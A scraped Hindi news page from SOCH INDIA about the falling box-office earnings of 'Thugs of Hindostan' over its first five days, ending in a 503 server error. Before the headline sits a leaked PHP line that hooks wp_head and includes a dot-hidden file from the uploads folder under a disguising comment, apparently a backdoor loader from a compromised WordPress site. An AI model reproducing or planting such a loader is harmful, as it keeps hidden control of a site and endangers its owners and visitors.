add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘ठग्स ऑफ हिंदोस्तान’ की कमाई में भारी गिरावट, 5वें दिन हुआ बुरा हाल – SOCH INDIA
Menu

मनोरंजन
‘ठग्स ऑफ हिंदोस्तान’ की कमाई में भारी गिरावट, 5वें दिन हुआ बुरा हाल

nobanner

बॉक्स ऑफिस पर बॉलीवुड एक्टर आमिर खान और महानायक अमिताभ बच्चन की फिल्म ‘ठग्स ऑफ हिंदोस्तान’ की कमाई में लगातार गिरावट देखने को मिल रही है. भले ही फिल्म ने महज तीन दिनों में 100 करोड़ का आंकड़ा पार कर लिया हो लेकिन, कमाई में लगातार गिरावट से लोगों के बीच ऐसे सवाल पैदा होने लगे हैं कि मुनाफा तो दूर, क्या यह फिल्म अपने लागत को पा सकेगी या नहीं? मीडिया रिपोर्ट्स के अनुसार इस फिल्म का बजट कुल 300 करोड़ बताया जा रहा है और फिल्म देखने के बाद ऐसा ऐहसास भी होता है कि ‘ठग्स ऑफ हिंदोस्तान’ को बनाने में बड़ा बजट लगाया गया है.

बता दें कि बॉक्स ऑफिस कलेक्शन के हिसाब से रविवार को ‘ठग्स ऑफ हिंदोस्तान’ ने लगभग 16.50 से 17 करोड़ के बीच की कमाई की थी. वहीं, सोमवार को फिल्म की झोली में महज 5.25 करोड़ रुपये ही गिरे हैं, जो इसके पिछले दिनों से काफी कम है. फिल्म समीक्षक तरण आर्दश के मुताबिक इससे पहले फिल्म ने शनिवार को 22.75 और शुक्रवार को कुल 28.25 करोड़ रुपये बटोरे थे. वहीं, फिल्म की पहले दिन की कमाई ने सबसे बड़ी ओपनिंग का रिकॉर्ड भी बनाया था. रिलीज के दिन यानी गुरुवार को इस फिल्म ने कुल 50.75 करोड़ रुपये की कमाई करने में सफलता हासिल की थी.

‘ठग्स ऑफ हिंदोस्तान’ की पहले दिन की कमाई, फिल्म ‘संजू’ के पहले दिन के कलेक्शन (34.75 करोड़) से तकरीबन ढ़ेड़ गुना आगे रही. तरण आदर्श के मुताबिक ‘संजू’ के अलावा ‘रेस 3’ ने ओपनिंग कलेक्शन 29.17, ‘गोल्ड’ ने 25.25 और ‘बागी 2’ ने 25.10 करोड़ रुपए की कमाई की थी. इस हिसाब से साल की टॉप 5 में से कोई भी फिल्म ‘ठग्स ऑफ हिंदोस्तान’ के आसपास भी नजर नहीं आ रही. हालांकि इस फिल्म ने अपने डिजिटल राइट्स से भी तगड़ी रकम वसूल की है. जिसके कारण इसके नाम यह रिकॉर्ड भी दर्ज हो गया है कि यह अब तक की सबसे कीमती डिजिटल राइट्स वाली फिल्म है. आमिर और अमिताभ की इस फिल्म के सैटेलाइट और डिजिटल राइट्स फिल्म रिलीजिंग से पहले ही 150 करोड़ रुपये में बेचे जा चुके हैं. इससे पहले इस रिकॉर्ड की बात की जाए तो सलमान खान की फिल्म ‘रेस 3’ के राइट्स 130 करोड़ रुपये में बिके थे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.